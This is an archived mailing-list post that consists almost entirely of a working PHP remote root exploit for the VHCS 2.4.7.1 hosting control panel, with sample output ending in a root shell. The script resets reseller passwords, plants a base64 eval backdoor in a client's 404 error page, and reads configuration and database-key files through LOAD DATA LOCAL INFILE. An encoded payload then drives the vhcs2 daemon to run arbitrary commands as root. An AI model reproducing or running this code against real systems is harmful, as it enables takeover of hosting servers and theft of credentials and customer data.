[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit



#!/usr/bin/php -q
<?php
# This file requires the PhpSploit class.
# If you want to use this class, the latest
# version can be downloaded from acid-root.new.fr.
##################################################
error_reporting(E_ALL ^ E_NOTICE);
require('phpsploitclass.php');

# darkfig@darky:/# ./vhcs_sploit.php -url http://localhost/vhcs2/
#
#  VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit
#  --------------------------------------------------
# 
# About:
#  by DarkFig < gmdarkfig (at) gmail (dot) com >
#  http://acid-root.new.fr/
#  #acidroot@xxxxxxxxxxxxxxxx
# 
# Exploit:
#  + Logged in (Administrator)
#  + The administrator has 2 resellers
#  / Changing dareseller's password
#  / Trying to connect as dareseller:thatpwnz
#  + Login successful
#  + The reseller has 2 users
#  + Host domaintest.fr is connected
#  / Trying to write PHP code
#  + PHP code successfully written
#  / We'll have to bypass open_basedir cause safe_mode=On
#  - User  doesn't have SQL rights
#  / Host domaintest.fr isn't a valid user
#  + Host xpliamaclient.com is connected
#  / Trying to write PHP code
#  + PHP code successfully written
#  / We'll have to bypass open_basedir cause safe_mode=On
#  - User  doesn't have SQL rights
#  / Host xpliamaclient.com isn't a valid user
#  / Changing unautresel's password
#  / Trying to connect as unautresel:thatpwnz
#  + Login successful
#  + The reseller has 1 users
#  + Host thegoodone.com is connected
#  / Trying to write PHP code
#  + PHP code successfully written
#  / We'll have to bypass open_basedir cause safe_mode=On
#  / Trying to create a database
#  + Database 92xpl_db39 successfully created
#  + Using database id 12
#  / Trying to add SQL user
#  + User 93xpl_usr2 successfully created
#  + Using SQL user id 17
#  + Host thegoodone.com is a valid user
#  + Logged in (thegoodone.com - Client)
#  / Trying to load files via local_infile
#  + Ok: /etc/vhcs2/vhcs2.conf
#  + Ok: /var/www/vhcs2/gui/include/vhcs2-db-keys.php
#  + Now you can execute commands as root =]
#  + root@xxxxxxxxxxxxxx: id
# 
# uid=0(root) gid=0(root)
#

class vhcs_xpl extends phpsploit
{
	var $sleep_time = 4;

	#  -rw-r--r-- 1 root root
	var $conf_path = '/etc/vhcs2/vhcs2.conf';

	# -r-------- 1 www-data www-data
	var $keys_path = '/var/www/vhcs2/gui/include/vhcs2-db-keys.php';

	var $head_arr = array(
            'admin/index.php'       => 3,
	    'reseller/index.php'    => 2,
	    '../reseller/index.php' => 2,
	    'client/index.php'      => 1,
	    ''	                    => 0);

	var $privileges = array(
	    3 => 'Administrator',
	    2 => 'Reseller',
	    1 => 'Client');

	var $reg_arr = array(
            1 => '#edit_reseller\.php\?edit_id=([0-9]+)" class="link">(.*) </a> </td>#i',
	    2 => '#edit_user.php\?edit_id=([0-9]+)" class="link">(.*)</a></td>#i',
	    3 => '#delete_sql_database\.php\?id=([0-9]+)#i',
	    4 => '#delete_sql_database\.php\?id=([0-9]+)#i',
	    5 => '#sql_execute_query.php\?id=([0-9]+)#i');

	var $flags = array(
	   -1 => '-',
	    0 => '/',
	    1 => '+');

	function main()
	{
		$this->agent('Mozilla Firefox');
		$this->cookiejar(1);

		$this->mhead();

		$this->uri      = $this->getparam('url', TRUE);
		$this->url_arr  = parse_url($this->uri);

		$this->patch = $this->getparam('patch');
		$this->proxh = $this->getparam('proxhost');
		$this->proxa = $this->getparam('proxauth');

		if($this->proxh)
		   $this->proxy($this->proxh);

		if($this->proxa)
		   $this->proxyauth($this->proxa);

		print "\nExploit:";
		$this->type = $this->login();

		if(empty($this->type))
		{
			if(!$this->patch)
			{
				$this->msg('A patch has been applied to this website', -1);
				$this->msg("See RoMaNSoFt's advisory for more details", -1);
				$this->msg('Try with the -patch option', -1, 1);
			}
			else
			   $this->msg('Bad username/password', -1, 1);
		}

		$this->msg("Logged in (".$this->usr.' - '.$this->privileges[$this->type].')', 1);

		$this->allowredirection(1);

		$this->get_vhcs_conf();

		$this->exec_cmd();

		return;
	}


	function getparam($param, $nec=FALSE)
	{
		global $argv;

		foreach($argv as $value => $key)
		{
			if($key === '-'.$param)
			   return $argv[$value+1];
		}

		if($nec)
		   $this->usage();
		
		return FALSE;
	}

	function mhead()
	{
		print "\n VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit";
		print "\n --------------------------------------------------\n";
		print "\nAbout:";
		print "\n by DarkFig < gmdarkfig (at) gmail (dot) com >";
		print "\n http://acid-root.new.fr/";;
		print "\n #acidroot@xxxxxxxxxxxxxxxx";
		print "\n";
	
		return;
	}
	
	function usage()
	{
		print "\nUsage:";
		print "\n vhcsxpl.php -url <url> [options...]\n";
		print "\nOptions:";
		print "\n -patch <user:pwd>     Unofficial patch applied";
		print "\n -proxhost <ip>        If you wanna use a proxy";
		print "\n -proxauth <usr:pwd>   Proxy with authentication\n";
		print "\n";
	
		exit(1);
	}

	function log_as()
	{
		$this->msg("Trying to connect as ".$this->usr.':'.$this->pwd, 0);
		$this->allowredirection(1);

		$this->post($this->uri.'chk_login.php',
		'uname='.$this->usr.'&upass='.$this->pwd.'&Submit=+++Login+++');

		$this->redir_type = $this->get_type_by_redir();

		if($this->redir_type == 0)
		   $this->msg('Login attempt failed', -1);

		else
		   $this->msg('Login successful', 1);

		return $this->redir_type;
	}

	function get_type_by_redir()
	{
		$this->redir_arr = parse_url($this->last_redirection);
			
		$this->allowredirection(0);

		return $this->head_arr[$this->redir_arr['path']];
	}
	
	function login()
	{
		if($this->patch)
		{
			$this->idents = explode(':', $this->patch);
			list($this->usr, $this->pwd) =	$this->idents;

			$this->type = $this->log_as();

			return $this->log_as_user();
		}
		else
		{
			$this->get($this->uri.'admin/manage_users.php');

			$this->type = 3;

			if(ereg('add_user\.php', $this->getcontent()))
			   return $this->log_as_user();

			else
			   return 0;
		}
	}

	function log_as_user()
	{
		if($this->type == 3)
		   $this->logged_as_admin();

		if($this->type == 2)
		   $this->logged_as_reseller();

		if($this->type == 1)
		{
			if(!$this->patch)
			   return 1;

			else
			   return $this->valid_user();
		}

		else
		   return 0;
	}

	function valid_user()
	{
		if($this->write_code())
		{
			# open_basedir + safe_mode
			if($this->is_safe())
			{
				if($this->bypass_with_db())
				   return 1;

				else
				   return 0;
			}
			else
			   return 1;
		}
		return 0;		
	}

	function logged_as_admin()
	{
		$this->msg('Logged in ('.$this->privileges[3].')', 1);

		$this->get($this->uri.'admin/manage_users.php');

		preg_match_all($this->reg_arr[1], $this->getcontent(), $resellers);

		$this->reseller_count = count($resellers[1]);

		$this->msg('The administrator has '.$this->reseller_count.' resellers', 1);

		for($i=0; $i<$this->reseller_count; $i++)
		{	
			$this->usr = $resellers[2][$i];
			$this->pwd = 'thatpwnz';

			if(!$this->patch)
		   	{
				$this->msg('Changing '.$resellers[2][$i]."'s password", 0);

				$this->reseller_dat = '';

				$this->get($this->uri.'admin/edit_reseller.php?edit_id='.$resellers[1][$i]);

				# only checked ip
				preg_match_all('#name="ip_([0-9]+)" value="asgned" checked#i',
				$this->getcontent(), $reseller_ips);

				$this->ip_count = count($reseller_ips[1]);
				$this->ip_dat = '';

				for($j=0; $j<$this->ip_count; $j++)
				{
					$this->ip_dat .= 'ip_'.$reseller_ips[1][$j].'=asgned';

		   	 		if($j != $this->ip_count-1)
		  	    		   $this->ip_dat .= '&';
				}

				# Change reseller's password/mail
				# This is needed if it was run without -path
				# Because we can't click on the 'Change' button.
				#
				# pwd: thatpwnz
				# mail: <reseller_name>@ohyeah.com
				#
				$this->post($this->uri.'admin/edit_reseller.php',
				'username='.$resellers[2][$i].'&pass=thatpwnz&'.
				'pass_rep=thatpwnz&email='.$resellers[2][$i].''.
				'%40ohyeah.com&nreseller_max_domain_cnt=0&nres'.
				'eller_max_subdomain_cnt=0&nreseller_max_alias'.
				'_cnt=0&nreseller_max_mail_cnt=0&nreseller_max'.
				'_ftp_cnt=0&nreseller_max_sql_db_cnt=0&nresell'.
				'er_max_sql_user_cnt=0&nreseller_max_traffic=0'.
				'&nreseller_max_disk=0&'.$this->ip_dat.'&custo'.
				'mer_id=&fname=&lname=&firm=&zip=&city=&countr'.
				'y=&street1=&street2=&phone=&fax=&Submit=++Upd'.
				'ate++&uaction=update_reseller&edit_id='.
				$resellers[1][$i].'&edit_username='.
				$resellers[2][$i]);

				if($this->log_as() != 2)
				   return 0;
			}
			else
			{
				$this->allowredirection(1);

				$this->get($this->uri.'admin/change_user_interface.php?to_id='.$resellers[1][$i]);

				if($this->get_type_by_redir() != 2)
				   return 0;
			}

			if($this->logged_as_reseller())
			   return 1;

			$this->reset('cookie');
			$this->get($this->uri.'reseller/change_user_interface.php?action=go_back');
		}

		return 0;
	}

	function logged_as_reseller()
	{
		$this->get($this->uri.'reseller/users.php');

		preg_match_all($this->reg_arr[2], $this->getcontent(), $users);
		
		array_walk($users[2], 'trim');
		
		$this->user_count = count($users[1]);
		
		$this->msg('The reseller has '.$this->user_count. ' users', 1);

		$this->patch = FALSE;

		for($i=0; $i<$this->user_count; $i++)
		{
			if($this->is_alive($users[2][$i]))
			{
				$this->usr = $users[2][$i];

				$this->type = 1;

				$this->msg('Host '.$this->usr.' is connected', 1);

				$this->get($this->uri.'reseller/change_user_interface.php?to_id='.$users[1][$i]);

				if($this->valid_user())
				{
					$this->msg('Host '.$this->usr.' is a valid user', 1);
					return TRUE;
				}
				else
				   $this->msg("Host ".$this->usr." isn't a valid user", 0);
			}
			else
			   $this->msg('Host '.$users[2][$i].' seems down', -1);

			$this->get($this->uri.'client/change_user_interface.php?action=go_back');
		}

		return FALSE;
	}

	function bypass_with_db()
	{
		$this->get($this->dmn_vhcs_url.'client/index.php');

		if(!ereg('manage_sql.php', $this->getcontent()) and !$edit)
		{
			$this->msg("User ".$this->ur." doesn't have SQL rights", -1);

			return FALSE;
		}
		
		# No database
		if(!$this->got_db())
		{
			$this->msg('Trying to create a database', 0);

			$this->tmp_db_name = rand(0,100).'xpl_db'.rand(0,100);

			# Database: ..xpl_db..
			$this->post($this->dmn_vhcs_url.'client/add_sql_database.php',
			'db_name='.$this->tmp_db_name.'&id_pos=start&Submit=++Add++&'.
			'uaction=add_db');

			if($this->got_db())
			   $this->msg('Database '.$this->tmp_db_name.' successfully created', 1);

			else
			{
				$this->msg("Can't create the database ".$this->tmp_db_name, 0);

				return FALSE;
			}
		}

		# First database
		$this->db_id = $this->sql_db_ids[1];

		$this->msg('Using database id '.$this->db_id, 1);

		if(!$this->got_db_user())
		{
			$this->msg('Trying to add SQL user', 0);

			$this->tmp_db_user = rand(0,100).'xpl_usr'.rand(0,100);
			
			# SQL user: ..xpl_usr..:xpl_pwd
			$this->post($this->dmn_vhcs_url.'client/sql_add_user.php',
			'user_name='.$this->tmp_db_user.'&id_pos=end&pass=xpl_pw'.
			'd&pass_rep=xpl_pwd&Add_New=++Add++&uaction=add_user&id='.
			$this->db_id);

			if($this->got_db_user())
			   $this->msg('User '.$this->tmp_db_user.' successfully created', 1);

			else
			{
				$this->msg("Can't create the SQL user ".$this->tmp_db_user, 0);

				return FALSE;
			}
		}

		# First SQL user id associed with the database
		$this->db_user_id = $this->sql_usrs[1];

		$this->msg('Using SQL user id '.$this->db_user_id, 1);

		return TRUE;
	}

	function got_db_user()
	{		
		$this->get($this->dmn_vhcs_url.'client/manage_sql.php');

		$this->content_arr = explode("\n", $this->getcontent());

		$this->is_sql_db_usr = FALSE;

		for($i=0; $i<count($this->content_arr); $i++)
		{
			if(preg_match($this->reg_arr[4],
			$this->content_arr[$i], $this->sql_db_id))
			{
				if($this->sql_db_id[1] == $this->db_id)
				   $this->is_sql_db_usr = TRUE;

				else
				   $this->is_sql_db_usr = FALSE;
			}

			if(preg_match($this->reg_arr[5],
			$this->content_arr[$i], $this->sql_usrs))
			{
				if($this->is_sql_db_usr)
				   return TRUE;
			}
		}
		return FALSE;
	}

	function got_db()
	{	
		$this->get($this->dmn_vhcs_url.'client/manage_sql.php');

		preg_match($this->reg_arr[3],
		$this->getcontent(), $this->sql_db_ids);

		if(empty($this->sql_db_ids))
		   return FALSE;

		else
		   return TRUE;
	}

	function is_alive($domain_name)
	{
		if(gethostbyname($domain_name) != $domain_name)
		   return TRUE;

		else
		   return FALSE;
	}

	function write_code()
	{
		$this->msg('Trying to write PHP code', 0);

		$this->dmn_url      = 'http://'.$this->usr;
		$this->dmn_vhcs_url = $this->dmn_url.$this->url_arr['path'];

		$this->get($this->dmn_url.'/errors/404/index.php');
		$this->old_404 = $this->getcontent();

		$this->phpc =
		 '<?php '
		.'error_reporting(0); '
		.'if(isset($_SERVER[\'HTTP_SHELL\'])) '
		.'{ eval(base64_decode($_SERVER[\'HTTP_SHELL\'])); exit(0); } '
		.'?>';

		$this->new_404 = $this->phpc.$this->old_404;

		$this->post($this->dmn_vhcs_url.'client/error_pages.php',
		'error='.urlencode($this->new_404).'&uaction=updt_error&eid=404&Submit=+Save+');

		$this->exec_php('print "itworkz";');

		if(ereg('itworkz', $this->getcontent()))
		{
			$this->msg('PHP code successfully written', 1);

			return TRUE;
		}
		else
		{
			$this->msg("Can't write PHP code", -1);

		   	return FALSE;
		}
	}

	function get_vhcs_conf()
	{
		if($this->safe_mode)
		   $this->msg('Trying to load files via local_infile', 0);

		else
		   $this->msg('Trying to load files via shell_exec', 0);

		$this->lf_conf   = $this->path_content($this->conf_path);
		$this->lf_conf   = trim($this->lf_conf, "\r");

		$this->vhcs_conf = explode("\n", $this->lf_conf);

		$this->conf = array();

		foreach($this->vhcs_conf as $this->conf_line)
		{
			# comment
			if(!ereg('^(\s*)#', $this->conf_line))
			{
				$this->pos   = strpos($this->conf_line, '=');
				$this->name  = strtoupper(trim(substr($this->conf_line, 0, $this->pos)));
				$this->value = trim(substr($this->conf_line, $this->pos+1));

				$this->conf[$this->name] = $this->value;
			}
		}

		$this->php_keys_code = $this->path_content($this->keys_path);

		return;
	}

	function path_content($path)
	{
		# open_basedir On/off
		# safe_mode = Off
		if(!$this->safe_mode)
		{
			$this->phpc = 'print shell_exec("cat '.$path.'");';

			$this->exec_php($this->phpc);

			$this->file_content = $this->getcontent();

		}

		# open_basedir On/Off
		# safe_mode = On
		else
		{
			$this->rand_table = rand().'tmp_hax'.rand();

			$this->sql_query =
			"CREATE TABLE ".$this->rand_table." (content text not null); ".
			"LOAD DATA LOCAL INFILE '$path' INTO TABLE ".$this->rand_table.
			" FIELDS TERMINATED BY '__EOF__' ESCAPED BY '' LINES TERMINAT".
			"ED BY '__EOF__'; SELECT CONCAT(CHAR(80,87,78,69,68,67,79,78,".
			"84,69,78,84),HEX(content),CHAR(80,87,78,69,68,67,79,78,84,69".
			",78,84)) FROM ".$this->rand_table."; DROP TABLE ".
			$this->rand_table;

			$this->sql_arr = explode(';', $this->sql_query);
			$this->sql_cnt = count($this->sql_arr);

			for($i=0; $i<$this->sql_cnt; $i++)
			{
				$this->sql_res = $this->exec_sql($this->sql_arr[$i]);

				if($i == $this->sql_cnt-2)
				   $this->file_content = $this->sql_res;
			}
			
		}

		if(!$this->file_content)
		{
			$this->msg("A problem occurred while trying to read the file $path", -1);
			
			if($this->safe_mode)
			   $this->msg("local_infile=Off or we don't have sufficient access rights to the file", -1, 2);

			else
			   $this->msg("We don't have sufficient access rights to the file", -1, -2);
		}
		else
		   $this->msg("Ok: $path", 1);

		return $this->file_content;
	}

	function exec_sql($query)
	{
		$this->post($this->dmn_vhcs_url.'client/sql_execute_query.php',
		'user_name=&sql_query='.$query.'&Submit=+Execute+&uaction=exe'.
		'cute_query&id='.$this->db_user_id);

		$this->sql_result = '';

		if(ereg('PWNEDCONTENT', $this->getcontent()))
		{
			$this->sql_res_arr = explode('PWNEDCONTENT', $this->getcontent());

			$this->sql_result  = pack('H*', $this->sql_res_arr[1]);
		}
	
		return $this->sql_result;
	}

	function is_safe()
	{
		$this->phpc =
		'if(in_array(strtoupper(ini_get("safe_mode")),array("ON","1")) '
	       .'or !function_exists("shell_exec")) '
	       .'{ print "safe_mode=on"; }';

		$this->exec_php($this->phpc);

		# open_basedir always set
		if(ereg('safe_mode=on', $this->getcontent()))
		{
			$this->msg("We'll have to bypass open_basedir cause safe_mode=On", 0);

			$this->safe_mode = TRUE;
		}
		else
		{
			$this->msg('PHP configured with default safe_mode value (Off)', 0);

			$this->safe_mode = FALSE;
		}

		return $this->safe_mode;
	}

	function exec_cmd()
	{
		$this->msg("Now you can execute commands as root =]", 1);

		$this->woot_code =
		 'PD9waHAKCi8qCm1haWwoJ2xlZXRAcHduZWQuY29tJywgJ3Z1bG'
		.'5lcmFibGUgdmhjcyBob3N0ICEnLCAndGh4IHRvIHRoZSBzayAh'
		.'IHZoY3MgdnVsbiBob3N0OiAnLiRfU0VSVkVSWydSRU1PVEVfQU'
		.'REUiddKTsKdGhpcyBpcyBhIGpva2UgPVAgd2hlbiB5b3UgdXNl'
		.'IGVuY29kZWQgcGhwIGNvZGUsIHNlZSB3aGF0IGlzIGl0IGJlZm'
		.'9yZSB1c2luZyBpdCA9KQoqLwokdmFsaWRfdiA9ICdIVFRQX1NQ'
		.'TE9JVF8nOwoKZm9yZWFjaCgkX1NFUlZFUiBhcyAkaGVhZGVyID'
		.'0+ICR2YWx1ZSkKewoJaWYoIWlzX2FycmF5KCR2YWx1ZSkpCgl7'
		.'CgkJJHZhbHVlID0gYmFzZTY0X2RlY29kZSgkdmFsdWUpOwoKCQ'
		.'lpZihlcmVnKCR2YWxpZF92LCRoZWFkZXIpKQoJCXsKCQkJaWYo'
		.'ZXJlZygnUEhQX0tFWVMnLCAkaGVhZGVyKSkKCQkJICAgZXZhbC'
		.'gkdmFsdWUpOwoKCQkJZWxzZQoJCQl7CgkJCQkkdmFyX24gID0g'
		.'c3RydG9sb3dlcihzdHJfcmVwbGFjZSgkdmFsaWRfdiwnJywgJG'
		.'hlYWRlcikpOwoJCQkJJCR2YXJfbiA9ICR2YWx1ZTsKCQkJfQoJ'
		.'CX0KCX0KfQoKbXlzcWxfY29ubmVjdCgkZGJfaG9zdCwkZGJfdX'
		.'NlcixkZWNyeXB0X2RiX3Bhc3N3b3JkKCRkYl9wYXNzKSk7Cm15'
		.'c3FsX3NlbGVjdF9kYigkZGJfbmFtZSk7CgokZmlsZSA9IGFkZH'
		.'NsYXNoZXMoJGZpbGUpOwokY21kICA9IGFkZHNsYXNoZXMoJGNt'
		.'ZCk7CiRWZXJzaW9uID0gJHZlcnNpb247CgokYWRkID0gYXJyYX'
		.'koKTsKJGFkZFtdID0gCiJJTlNFUlQgSU5UTyBkb21haW4gKGBk'
		.'b21haW5fbmFtZWAsYGRvbWFpbiIuCiJfZ2lkYCxgZG9tYWluX3'
		.'VpZGAsYGRvbWFpbl9hZG1pbl9pZGAsYGRvbSIuCiJhaW5fY3Jl'
		.'YXRlZF9pZGAsYGRvbWFpbl9jcmVhdGVkYCxgZG9tYWluXyIuCi'
		.'JsYXN0X21vZGlmaWVkYCxgZG9tYWluX21haWxhY2NfbGltaXRg'
		.'LGBkbyIuCiJtYWluX2Z0cGFjY19saW1pdGAsYGRvbWFpbl90cm'
		.'FmZmljX2xpbWl0YCIuCiIsYGRvbWFpbl9zcWxkX2xpbWl0YCxg'
		.'ZG9tYWluX3NxbHVfbGltaXRgLCIuCiJgZG9tYWluX3N0YXR1c2'
		.'AsYGRvbWFpbl9hbGlhc19saW1pdGAsYGRvbSIuCiJhaW5fc3Vi'
		.'ZF9saW1pdGAsYGRvbWFpbl9pcF9pZGAsYGRvbWFpbl9kaSIuCi'
		.'Jza19saW1pdGAsYGRvbWFpbl9kaXNrX3VzYWdlYCxgZG9tYWlu'
		.'X3BocCIuCiJgLGBkb21haW5fY2dpYCkgVkFMVUVTICgnZGVsZX'
		.'RlbWViaWF0Y2g7JGNtZCIuCiIgPiAkZmlsZTtybSAvdG1wL2h0'
		.'YWNjZXNzLXVzZXItY2YtZGVsZXRlbSIuCiJlYmlhdGNoO2VjaG'
		.'8gMSMnLCcwJywgJzAnLCAnLTEnLCAnLTEnLCAnMCIuCiInLCAn'
		.'MCcsICcwJywgJzAnLCAnMCcsICcwJywgJzAnLCdvaycsICcwJy'
		.'IuCiIsJzAnLCAnLTEnLCAnMCcsICcwJywgJ3llcycsICd5ZXMn'
		.'KSI7CgokYWRkW10gPQoiSU5TRVJUIElOVE8gaHRhY2Nlc3MgKG'
		.'BkbW5faWRgLGB1c2VyX2lkYCwiLgoiYGdyb3VwX2lkYCxgYXV0'
		.'aF90eXBlYCxgYXV0aF9uYW1lYCxgcGF0aGAiLgoiLGBzdGF0dX'
		.'NgKSBWQUxVRVMgKChTRUxFQ1QgZG9tYWluX2lkIEZST00iLgoi'
		.'IGRvbWFpbiBXSEVSRSBkb21haW5fbmFtZSBMSUtFICclJGZpbG'
		.'UlJykiLgoiLC0xLDAsJ0Jhc2ljJywnaHVodScsJy90bXAnLCd0'
		.'b2FkZCcpIjsKCmV4ZWNfc3FsKCRhZGQpOwoKc2VuZF9yZXF1ZX'
		.'N0KCk7CnNsZWVwKCRzbGVlcF90aW1lKTsKcHJpbnQoZmlsZV9n'
		.'ZXRfY29udGVudHMoJGZpbGUpKTsKdW5saW5rKCRmaWxlKTsKCi'
		.'RkZWwgPSBhcnJheSgpOwokZGVsW10gPSAKIkRFTEVURSBGUk9N'
		.'IGh0YWNjZXNzIFdIRVJFIGRtbl9pZCA9IChTRUxFQyIuCiJUIG'
		.'RvbWFpbl9pZCBGUk9NIGRvbWFpbiBXSEVSRSBkb21haW5fbmFt'
		.'ZSAiLgoiTElLRSAnJSRmaWxlJScpIjsKCiRkZWxbXSA9CiJERU'
		.'xFVEUgRlJPTSBkb21haW4gV0hFUkUgZG9tYWluX25hbWUgTElL'
		.'RSAiLgoiJyUkZmlsZSUnIjsKCmV4ZWNfc3FsKCRkZWwpOwoKZn'
		.'VuY3Rpb24gZXhlY19zcWwoJHNxbF9hcnIpCnsKCWZvcmVhY2go'
		.'JHNxbF9hcnIgYXMgJHNxbF9xKQoJICAgbXlzcWxfcXVlcnkoJH'
		.'NxbF9xKSB8fCBkaWUobXlzcWxfZXJyb3IoKSk7CgoJcmV0dXJu'
		.'Owp9CgovLyB2aGNzCmZ1bmN0aW9uIGRlY3J5cHRfZGJfcGFzc3'
		.'dvcmQgKCRkYl9wYXNzKSB7CgogICAgIGdsb2JhbCAkdmhjczJf'
		.'ZGJfcGFzc19rZXk7CiAgICAgZ2xvYmFsICR2aGNzMl9kYl9wYX'
		.'NzX2l2OwogICAgICAgICAgIAogICAgJHRleHQgPSBiYXNlNjRf'
		.'ZGVjb2RlKCIkZGJfcGFzc1xuIik7CiAgICAKICAgIC8qIE9wZW'
		.'4gdGhlIGNpcGhlciAqLwogICAgJHRkID0gbWNyeXB0X21vZHVs'
		.'ZV9vcGVuICgnYmxvd2Zpc2gnLCAnJywgJ2NiYycsICcnKTsKIC'
		.'AgIAogICAgLyogQ3JlYXRlIGtleSAqLwogICAgICAgICRrZXkg'
		.'PSAkdmhjczJfZGJfcGFzc19rZXk7CiAgICAKICAgIC8qIENyZW'
		.'F0ZSB0aGUgSVYgYW5kIGRldGVybWluZSB0aGUga2V5c2l6ZSBs'
		.'ZW5ndGggKi8KICAgICAgICAkaXYgPSAkdmhjczJfZGJfcGFzc1'
		.'9pdjsKICAgICAgCiAgICAvKiBJbnRpYWxpemUgZW5jcnlwdGlv'
		.'biAqLyAgICAgICAgICAgICAgICAgICAgCiAgICBtY3J5cHRfZ2'
		.'VuZXJpY19pbml0ICgkdGQsICRrZXksICRpdik7CiAgICAgICAg'
		.'ICAgICAgICAgICAgICAKICAgIC8qIERlY3J5cHQgZW5jcnlwdG'
		.'VkIHN0cmluZyAqLyAgICAKICAgICRkZWNyeXB0ZWQgPSBtZGVj'
		.'cnlwdF9nZW5lcmljICgkdGQsICR0ZXh0KTsKICAgICAgICAgIC'
		.'AgICAgICAgICAgICAgICAKICAgIG1jcnlwdF9tb2R1bGVfY2xv'
		.'c2UgKCR0ZCk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgIC'
		.'AgICAgCiAgICAvKiBTaG93IHN0cmluZyAqLyAgICAgICAgICAg'
		.'ICAgICAgICAgICAgICAgICAgICAgICAKICAgIHJldHVybiB0cm'
		.'ltKCRkZWNyeXB0ZWQpOwp9CgovLyB2aGNzCmZ1bmN0aW9uIHNl'
		.'bmRfcmVxdWVzdCgpIHsKCiAgICBnbG9iYWwgJFZlcnNpb24sIC'
		.'RWZXJzaW9uSCwgJEJ1aWxkRGF0ZTsKCiAgICBAJHNvY2tldCA9'
		.'IHNvY2tldF9jcmVhdGUgKEFGX0lORVQsIFNPQ0tfU1RSRUFNLC'
		.'AwKTsKCiAgICBpZiAoJHNvY2tldCA8IDApIHsKICAgICAgICAk'
		.'ZXJybm8gPSAgInNvY2tldF9jcmVhdGUoKSBmYWlsZWQuXG4iOw'
		.'ogICAgICAgIHJldHVybiAkZXJybm87CiAgICB9CgogICAgQCRy'
		.'ZXN1bHQgPSBzb2NrZXRfY29ubmVjdCAoJHNvY2tldCwgIjEyNy'
		.'4wLjAuMSIsIDk4NzYpOwogICAgaWYgKCRyZXN1bHQgPT0gRkFM'
		.'U0UpIHsKICAgICAgICAkZXJybm8gPSAgInNvY2tldF9jb25uZW'
		.'N0KCkgZmFpbGVkLlxuIjsKICAgICAgICByZXR1cm4gJGVycm5v'
		.'OwogICAgfQoKICAgIC8qIHJlYWQgb25lIGxpbmUgd2l0aCB3ZW'
		.'xjb21lIHN0cmluZyAqLwogICAgJG91dCA9IHJlYWRfbGluZSgk'
		.'c29ja2V0KTsKCiAgICAvKiBzZW5kIGhlbGxvIHF1ZXJ5ICovCi'
		.'AgICAkcXVlcnkgPSAiaGVsbyAgJFZlcnNpb25cclxuIjsKICAg'
		.'IHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1ZXJ5LCBzdHJsZW'
		.'4gKCRxdWVyeSkpOwoKICAgIC8qIHJlYWQgb25lIGxpbmUgd2l0'
		.'aCBoZWxvIGFuc3dlciAqLwogICAgJG91dCA9IHJlYWRfbGluZS'
		.'gkc29ja2V0KTsKCiAgICAvKiBzZW5kIHJlZyBjaGVjayBxdWVy'
		.'eSAqLwogICAgJHF1ZXJ5ID0gImV4ZWN1dGUgcXVlcnlcclxuIj'
		.'sKICAgIHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1ZXJ5LCBz'
		.'dHJsZW4gKCRxdWVyeSkpOwogICAgLyogcmVhZCBvbmUgbGluZS'
		.'BrZXkgcmVwbGF5ICovCiAgICAkZXhlY3V0ZV9yZXBsYXkgPSBy'
		.'ZWFkX2xpbmUoJHNvY2tldCk7CgogICAgLyogc2VuZCBxdWl0IH'
		.'F1ZXJ5ICovCiAgICAkcXVpdF9xdWVyeSA9ICJieWVcclxuIjsK'
		.'ICAgIHNvY2tldF93cml0ZSAoJHNvY2tldCwgJHF1aXRfcXVlcn'
		.'ksIHN0cmxlbiAoJHF1aXRfcXVlcnkpKTsKICAgIC8qIHJlYWQg'
		.'cXVpdCBhbnN3ZXIgKi8KICAgICRxdWl0X3JlcGxheSA9IHJlYW'
		.'RfbGluZSgkc29ja2V0KTsKCiAgICAvKiBhbmFseXplIGtleSBy'
		.'ZXBsYXkgKi8KICAgICRhbnN3ZXIgPSAkZXhlY3V0ZV9yZXBsYX'
		.'k7CgogICAgLyogY2xvc2Ugc29ja2V0ICovCiAgICBzb2NrZXRf'
		.'Y2xvc2UgKCRzb2NrZXQpOwoKICAgIC8qIHJldHVybiBmdW5jdG'
		.'lvbiByZXN1bHQgKi8KICAgIHJldHVybiAkYW5zd2VyOwoKfQoK'
		.'Ly8gdmhjcwpmdW5jdGlvbiByZWFkX2xpbmUoJHNvY2tldCkgew'
		.'0KICAgICRjaCA9ICcnOw0KICAgICRsaW5lID0gJyc7DQogICAg'
		.'ZG97DQogICAgICAgICRjaCA9IHNvY2tldF9yZWFkKCRzb2NrZX'
		.'QsMSk7DQogICAgICAgICRsaW5lID0gJGxpbmUgLiAkY2g7DQog'
		.'ICAgfSB3aGlsZSgkY2ggIT0gIlxyIik7DQogICAgcmV0dXJuIC'
		.'RsaW5lOw0KfQo/Pgo=';

 		while($this->cmd_prompt())
		{
			$this->exec_php('print $_SERVER["DOCUMENT_ROOT"];');
			$this->tmp_file = $this->getcontent().'/'.md5(rand());

			$this->set_hvar('db-host',    $this->conf['DATABASE_HOST']);
			$this->set_hvar('db-user',    $this->conf['DATABASE_USER']);
			$this->set_hvar('db-pass',    $this->conf['DATABASE_PASSWORD']);
			$this->set_hvar('db-name',    $this->conf['DATABASE_NAME']);

			$this->set_hvar('sleep-time', $this->sleep_time);
			$this->set_hvar('file',       $this->tmp_file);
			$this->set_hvar('cmd',        $this->cmd);
			$this->set_hvar('version',    $this->conf['Version']);
			
			$this->set_hvar('php-keys',   '?>'.$this->php_keys_code);

			$this->exec_php('?>'.base64_decode($this->woot_code));

			print "\n".$this->getcontent();
		}

		exit(0);
	}

	function set_hvar($name, $value)
	{
		$this->addheader('Sploit-'.$name, base64_encode($value));

		return;
	}

	function cmd_prompt()
	{
		$this->msg('root@'.$this->usr.': ', 1);
		$this->cmd = trim(fgets(STDIN));

		if(!ereg('^(quit|exit)$', $this->cmd))
		   return TRUE;

		else
		   return FALSE;
	}

	function exec_php($php)
	{
		$this->addheader('Shell', base64_encode($php));
		$this->get($this->dmn_url.'/errors/404/index.php');

		return;
	}

	function msg($msg, $flag, $action=0)
	{
		print "\n ".$this->flags[$flag]."\x20".$msg;

		switch($action)
		{
			case 1:
				print "\n";
				return $this->usage();
			break;

			case 2:
				print "\n";
				exit(1);
			break;
		}
	}
}

$spl = new vhcs_xpl;
$spl->main();

?>